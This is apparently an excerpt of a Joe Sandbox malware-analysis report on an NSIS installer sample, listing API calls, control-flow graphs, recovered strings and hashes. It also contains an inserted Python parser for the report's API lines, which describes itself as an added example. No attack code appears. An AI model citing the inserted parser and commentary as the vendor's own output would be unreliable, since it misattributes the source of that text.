• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405654
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405665
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405678
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405686
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405699
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056BB
• ShowWindow.USER32(?,00000008), ref: 004056CF
• GetDlgItem.USER32(?,000003EC), ref: 004056F0
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405700
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405719
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405725
• GetDlgItem.USER32(?,000003F8), ref: 004055FE
  • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
• GetDlgItem.USER32(?,000003EC), ref: 00405742
• CreateThread.KERNELBASE(00000000,00000000,Function_00005516,00000000), ref: 00405750
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405757
• ShowWindow.USER32(00000000), ref: 0040577B
• ShowWindow.USER32(?,00000008), ref: 00405780
• ShowWindow.USER32(00000008), ref: 004057CA
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057FE
• CreatePopupMenu.USER32 ref: 0040580F
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405823
• GetWindowRect.USER32(?,?), ref: 00405843
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040585C
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405894
• OpenClipboard.USER32(00000000), ref: 004058A4
• EmptyClipboard.USER32 ref: 004058AA
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058B6
• GlobalLock.KERNEL32(00000000), ref: 004058C0
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004058D4
• GlobalUnlock.KERNEL32(00000000), ref: 004058F4
• SetClipboardData.USER32(0000000D,00000000), ref: 004058FF
• CloseClipboard.USER32 ref: 00405905
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                  • String ID: {
                                                                                                                                                                                                                                  • API String ID: 4154960007-366298937
                                                                                                                                                                                                                                  • Opcode ID: 30274ff220e81b54042d5ec4385cd695e560e63cfee1f62d03a7a46aa2ec4b26
                                                                                                                                                                                                                                  • Instruction ID: 548bfd7703c7e8b67cc6bd423be8dd859740628245fa72e8840ee51ebf386eb0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30274ff220e81b54042d5ec4385cd695e560e63cfee1f62d03a7a46aa2ec4b26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0B159B0900609FFDB11AF61DD89AAE7B79FB44354F00803AFA45B61A0C7754E51DF68

Control-flow Graph (rendered graph not reproduced here)
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
• Instruction ID: 1b8bdd5ad4fc83de7ba6cec7d94a6212227b50c179fbf06187fd9840cc1d6bdc
• Opcode Fuzzy Hash: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
• Instruction Fuzzy Hash: 44F18770D04229CBDF18CFA8C8946ADBBB1FF45305F25816ED852BB281D7386A86DF45

Control-flow Graph (rendered graph not reproduced here)
APIs
• FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405E01,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406744
• FindClose.KERNEL32(00000000), ref: 00406750
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: XgB
• API String ID: 2295610775-796949446
• Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
• Instruction ID: 870aa7139b81afaf1942c507467f7acad87ed8de72819481db2edd1f78cd0942
• Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
• Instruction Fuzzy Hash: 09D012316042305FC35127387E4C84B7B9A9F563393228B76B5AAF21E0C7748C3287AC

Control-flow Graph (rendered graph not reproduced here)
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E94
• ShowWindow.USER32(?), ref: 00403EB1
• DestroyWindow.USER32 ref: 00403EC5
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EE1
• GetDlgItem.USER32(?,?), ref: 00403F02
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F16
• IsWindowEnabled.USER32(00000000), ref: 00403F1D
• GetDlgItem.USER32(?,00000001), ref: 00403FCB
• GetDlgItem.USER32(?,00000002), ref: 00403FD5
• SetClassLongW.USER32(?,000000F2,?), ref: 00403FEF
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404040
• GetDlgItem.USER32(?,00000003), ref: 004040E6
• ShowWindow.USER32(00000000,?), ref: 00404107
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404119
• EnableWindow.USER32(?,?), ref: 00404134
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414A
• EnableMenuItem.USER32(00000000), ref: 00404151
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404169
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040417C
• lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004041A6
• SetWindowTextW.USER32(?,00423708), ref: 004041BA
• ShowWindow.USER32(?,0000000A), ref: 004042EE
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                                                                                                  • Opcode ID: 0b7f36f750eebe6e1f161721f6fbfdbf0deb52ea427a9cf17ec2d27919205841
                                                                                                                                                                                                                                  • Instruction ID: 0a9eb52b79e7a1f6ac08be675ff74ca1e342e547d7f0445f300758720cde36e9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b7f36f750eebe6e1f161721f6fbfdbf0deb52ea427a9cf17ec2d27919205841
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EC1D0B1600305EBDB216F62ED88D2A3A78FB95745F51053EFA42B11F0CB794852DB2D

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 293 403aaa-403ac2 call 4067d0 296 403ac4-403acf GetUserDefaultUILanguage call 406322 293->296 297 403ad6-403b0d call 4062a9 293->297 301 403ad4 296->301 302 403b25-403b2b lstrcatW 297->302 303 403b0f-403b20 call 4062a9 297->303 304 403b30-403b59 call 403d80 call 405db8 301->304 302->304 303->302 310 403beb-403bf3 call 405db8 304->310 311 403b5f-403b64 304->311 317 403c01-403c26 LoadImageW 310->317 318 403bf5-403bfc call 406418 310->318 311->310 312 403b6a-403b92 call 4062a9 311->312 312->310 322 403b94-403b98 312->322 320 403ca7-403caf call 40140b 317->320 321 403c28-403c58 RegisterClassW 317->321 318->317 335 403cb1-403cb4 320->335 336 403cb9-403cc4 call 403d80 320->336 323 403d76 321->323 324 403c5e-403ca2 SystemParametersInfoW CreateWindowExW 321->324 326 403baa-403bb6 lstrlenW 322->326 327 403b9a-403ba7 call 405cdd 322->327 329 403d78-403d7f 323->329 324->320 330 403bb8-403bc6 lstrcmpiW 326->330 331 403bde-403be6 call 405cb0 call 4063db 326->331 327->326 330->331 334 403bc8-403bd2 GetFileAttributesW 330->334 331->310 338 403bd4-403bd6 334->338 339 403bd8-403bd9 call 405cfc 334->339 335->329 345 403cca-403ce4 ShowWindow call 406760 336->345 346 403d4d-403d4e call 405516 336->346 338->331 338->339 339->331 353 403cf0-403d02 GetClassInfoW 345->353 354 403ce6-403ceb call 406760 345->354 349 403d53-403d55 346->349 351 403d57-403d5d 349->351 352 403d6f-403d71 call 40140b 349->352 351->335 357 403d63-403d6a call 40140b 351->357 352->323 355 403d04-403d14 GetClassInfoW RegisterClassW 353->355 356 403d1a-403d3d DialogBoxParamW call 40140b 353->356 354->353 355->356 362 403d42-403d4b call 4039fa 356->362 357->335 362->329
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                                                                                                                                                    • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                                                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,00000000), ref: 00403AC4
                                                                                                                                                                                                                                    • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(1033,00423708), ref: 00403B2B
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403BAB
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(: Completed), ref: 00403BC9
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C12
                                                                                                                                                                                                                                  • RegisterClassW.USER32(004291C0), ref: 00403C4F
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C67
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C9C
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403CD2
                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403D0B
                                                                                                                                                                                                                                  • RegisterClassW.USER32(004291C0), ref: 00403D14
                                                                                                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403E58,00000000), ref: 00403D33
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                  • API String ID: 606308-572083776
                                                                                                                                                                                                                                  • Opcode ID: f45dbe301eae32004318a3f9e680f07a8516310e0cd2211a6b62600ea06e2d0b
                                                                                                                                                                                                                                  • Instruction ID: a24d2e849b10ad8e1ed533e9d37a820f5d0e6b510d4fa7617ff35d8301a60578
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f45dbe301eae32004318a3f9e680f07a8516310e0cd2211a6b62600ea06e2d0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E761B670244600BAD720AF669D45E2B3A7CEB84B0AF40457FFD41B62E2DB7D5912CA2D
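The API listings in these function records all use one line shape: a bullet, an optional "Part of subcall function <addr>:" prefix for calls made one level down in a callee, then Function.Module(args), ref: <call-site address>; the argument list is sometimes absent (GetTickCount.KERNEL32 ref: 00403026), unresolved arguments print as "?", and raw numbers and pointers print as eight hex digits. The parser below is an added example and is not part of the Joe Sandbox report or its tooling. It turns such bullets into records and then pulls out the string constants the analyser resolved at the call sites (the registry path, the ".exe" extension, the "1033" locale and the RichEdit20W class name that also appear in the String ID line of the record above), which is a quick way to get a function's recovered strings out of a large report without the viewer. The sample input is constructed: five bullets copied from the records on this page plus one non-API bullet the parser must ignore; the assumption that anything eight hex digits long is a raw value rather than a string is taken from this page's own formatting.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed input: API-call bullets copied from the function records on this
# page, plus one dump-source bullet that is not an API call and must be skipped.
SAMPLE_LINES = """\
• GetDlgItem.USER32(?,00000002), ref: 00403FD5
  • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
• lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\\Desktop\\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
• GetTickCount.KERNEL32 ref: 00403026
• GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
"""

# One bullet per call. The parenthesised argument list is optional (see the
# GetTickCount and wsprintfW lines); 'ref:' is the call-site address in the dump.
_API_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Assumption from the report's formatting: an 8-hex-digit argument is a raw
# integer or pointer, not a recovered string.
_HEX8 = re.compile(r"^[0-9A-F]{8}$")


@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    args: Tuple[str, ...]
    ref: str                 # call-site address, as printed in the report
    subcall: Optional[str]   # callee address when the call happens one level down


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report bullets into ApiCall records; non-API bullets are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("func"), m.group("module"), args,
                             m.group("ref"), m.group("sub")))
    return calls


def literal_args(calls: List[ApiCall]) -> List[str]:
    """String constants resolved at the call sites, in first-seen order.
    '?' (unresolved) and 8-hex-digit values are dropped; what remains are
    paths, registry keys, locale ids and window class names."""
    seen: List[str] = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not _HEX8.match(a) and a not in seen:
                seen.append(a)
    return seen


def calls_by_module(calls: List[ApiCall], direct_only: bool = False) -> Dict[str, List[str]]:
    """Distinct API names grouped by DLL; direct_only drops 'Part of subcall' entries."""
    groups: Dict[str, set] = defaultdict(set)
    for c in calls:
        if direct_only and c.subcall is not None:
            continue
        groups[c.module].add(c.func)
    return {mod: sorted(funcs) for mod, funcs in groups.items()}


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for c in parsed:
        origin = f"via {c.subcall}" if c.subcall else "direct"
        print(f"{c.ref}  {c.module}!{c.func}  ({origin}, {len(c.args)} args)")
    print("strings:", literal_args(parsed))
    print("by module:", calls_by_module(parsed, direct_only=True))
```

Feeding a whole report's API section through parse_api_lines and then literal_args gives the recovered strings per function; calls_by_module with direct_only=True separates what the function itself imports from what its callees do, which matters when comparing two functions that share helpers.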

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 366 403015-403063 GetTickCount GetModuleFileNameW call 405ed1 369 403065-40306a 366->369 370 40306f-40309d call 4063db call 405cfc call 4063db GetFileSize 366->370 372 403245-403249 369->372 378 4030a3 370->378 379 403188-403196 call 402fb1 370->379 381 4030a8-4030bf 378->381 385 403198-40319b 379->385 386 4031eb-4031f0 379->386 383 4030c1 381->383 384 4030c3-4030cc call 403431 381->384 383->384 392 4031f2-4031fa call 402fb1 384->392 393 4030d2-4030d9 384->393 388 40319d-4031b5 call 403447 call 403431 385->388 389 4031bf-4031e9 GlobalAlloc call 403447 call 40324c 385->389 386->372 388->386 415 4031b7-4031bd 388->415 389->386 413 4031fc-40320d 389->413 392->386 397 403155-403159 393->397 398 4030db-4030ef call 405e8c 393->398 403 403163-403169 397->403 404 40315b-403162 call 402fb1 397->404 398->403 412 4030f1-4030f8 398->412 409 403178-403180 403->409 410 40316b-403175 call 4068bd 403->410 404->403 409->381 414 403186 409->414 410->409 412->403 419 4030fa-403101 412->419 420 403215-40321a 413->420 421 40320f 413->421 414->379 415->386 415->389 419->403 422 403103-40310a 419->422 423 40321b-403221 420->423 421->420 422->403 424 40310c-403113 422->424 423->423 425 403223-40323e SetFilePointer call 405e8c 423->425 424->403 426 403115-403135 424->426 429 403243 425->429 426->386 428 40313b-40313f 426->428 430 403141-403145 428->430 431 403147-40314f 428->431 429->372 430->414 430->431 431->403 432 403151-403153 431->432 432->403
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403026
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                                                                                                                                                                    • Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                                                                                                                                                    • Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                  • API String ID: 2803837635-2162933095
                                                                                                                                                                                                                                  • Opcode ID: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                                                                                                                                                                                  • Instruction ID: a1180c22f2f56a455fdba696775536d8b2bad2e91b267b1d20a8a943b96b17b0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD51E571904204ABDB209F64DD81B9E7EACEB05316F20407BF905BA3D1C77D8E81876D

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
control_flow_graph 433 406418-406423 434 406425-406434 433->434 435 406436-40644c 433->435 434->435 436 406452-40645f 435->436 437 406664-40666a 435->437 436->437 440 406465-40646c 436->440 438 406670-40667b 437->438 439 406471-40647e 437->439 441 406686-406687 438->441 442 40667d-406681 call 4063db 438->442 439->438 443 406484-406490 439->443 440->437 442->441 445 406651 443->445 446 406496-4064d4 443->446 449 406653-40665d 445->449 450 40665f-406662 445->450 447 4065f4-4065f8 446->447 448 4064da-4064e5 446->448 453 4065fa-406600 447->453 454 40662b-40662f 447->454 451 4064e7-4064ec 448->451 452 4064fe 448->452 449->437 450->437 451->452 455 4064ee-4064f1 451->455 458 406505-40650c 452->458 456 406610-40661c call 4063db 453->456 457 406602-40660e call 406322 453->457 459 406631-406639 call 406418 454->459 460 40663e-40664f lstrlenW 454->460 455->452 461 4064f3-4064f6 455->461 471 406621-406627 456->471 457->471 463 406511-406513 458->463 464 40650e-406510 458->464 459->460 460->437 461->452 467 4064f8-4064fc 461->467 469 406515-40653c call 4062a9 463->469 470 40654e-406551 463->470 464->463 467->458 483 406542-406549 call 406418 469->483 484 4065dc-4065df 469->484 472 406561-406564 470->472 473 406553-40655f GetSystemDirectoryW 470->473 471->460 475 406629 471->475 477 406566-406574 GetWindowsDirectoryW 472->477 478 4065cf-4065d1 472->478 476 4065d3-4065d7 473->476 480 4065ec-4065f2 call 40668a 475->480 476->480 485 4065d9 476->485 477->478 478->476 482 406576-406580 478->482 480->460 487 406582-406585 482->487 488 40659a-4065b0 SHGetSpecialFolderLocation 482->488 483->476 484->480 490 4065e1-4065e7 lstrcatW 484->490 485->484 487->488 491 406587-40658e 487->491 492 4065b2-4065c9 SHGetPathFromIDListW CoTaskMemFree 488->492 493 4065cb 488->493 490->480 495 406596-406598 491->495 492->476 492->493 493->478 495->476 495->488
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406559
                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040656C
                                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(0040547A,00418EC0,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 004065A8
                                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00418EC0,: Completed), ref: 004065B6
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00418EC0), ref: 004065C1
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004065E7
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(: Completed,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040663F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                                  • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                  • API String ID: 717251189-2549942501
                                                                                                                                                                                                                                  • Opcode ID: cf374de42321b31fcab9823a1dcbef99d7930476f55158ac4637f493945dcad9
                                                                                                                                                                                                                                  • Instruction ID: 14d1193dfffb306d7d50c4759d5107437c4365ff0453e231a2932b6079d00088
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf374de42321b31fcab9823a1dcbef99d7930476f55158ac4637f493945dcad9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27612771A00111ABDF209F24ED40ABE37A5AF54314F12813FE943B62D0DB3E89A2CB5D

                                                                                                                                                                                                                                  Control-flow Graph

